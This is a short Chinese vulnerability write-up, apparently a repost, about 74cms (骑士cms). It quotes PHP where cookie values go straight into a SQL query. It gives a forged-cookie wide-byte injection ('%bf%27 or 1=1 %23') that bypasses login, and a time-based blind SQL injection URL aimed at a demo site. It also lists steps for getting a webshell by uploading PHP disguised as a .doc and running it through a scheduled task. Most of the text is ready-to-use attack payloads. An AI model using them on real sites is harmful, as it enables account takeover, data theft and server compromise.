骑士cms注入及后台拿shell漏洞预警 -电脑资料

elseif((empty($_SESSION['uid']) || empty($_SESSION['username']) || empty($_SESSION['utype'])) &&$_COOKIE['QS']['username'] && $_COOKIE['QS']['password'] && $_COOKIE['QS']['uid'])

{

if(check_cookie($_COOKIE['QS']['username'],$_COOKIE['QS']['password']))

{

update_user_info($_COOKIE['QS']['uid'],false,false);

header("Location:".get_member_url($_SESSION['utype']));

}

else

{

unset($_SESSION['uid'],$_SESSION['username'],$_SESSION['utype'],$_SESSION['uqqid'],$_SESSION['activate_username'],$_SESSION['activate_email'],$_SESSION["openid"]);

setcookie("QS[uid]","",time() - 3600,$QS_cookiepath, $QS_cookiedomain);

setcookie('QS[username]',"", time() - 3600,$QS_cookiepath, $QS_cookiedomain);

setcookie('QS[password]',"", time() - 3600,$QS_cookiepath, $QS_cookiedomain);

setcookie("QS[utype]","",time() - 3600,$QS_cookiepath, $QS_cookiedomain);

header("Location:".url_rewrite('QS_login'));

}

include/fun_user.php

//检测COOKIE

function check_cookie($name,$pwd){

global $db;

$row = $db->getone("SELECT COUNT(*) AS num FROM ".table('members')." WHERE username='{$name}' and password = '{$pwd}'");

if($row['num'] > 0)

{

return true;

}else{

return false;

}

构造cookie如下

QS[uid]2

QS[utype]1

QS[password]111111111111111111111

QS[username]%bf%27 or 1=1 %23

uid 为假冒用户的ID utype为用户类型password任意

0x2 盲注

http://demo32.74cms.com//resume/resume-list.php?key=test00%bf')/**/and+if((select/**/admin_name/**/from/**/qs_admin/**/limit/**/0,1)=0x61646D696E,benchmark(1000000000,(select/**/1)),1)/**/%23

上面两个都是宽字节注入,如果你能猜出管理员密码，还能解出双重md5的话，还能猜出后台路径，继续看下面

0x3 后台拿shell

1.先关闭csrf防御功能

2.在hr工具箱中添加一个伪造的doc，内容为<?php phpinfo();?>，记下路径data/hrtools/2012/06/1339941553308.doc

3.在工具-计划任务中添加任务，脚本任务填../../data/hrtools/2012/06/1339941553308.doc

4.然后执行

0x4 随机函数问题(几乎可以无视，纯属个人YY)

在admin_common.fun.inc.php中有个$QS_pwdhash是在安装的时候赋值的，只要能猜出就可已不用解双重md5了，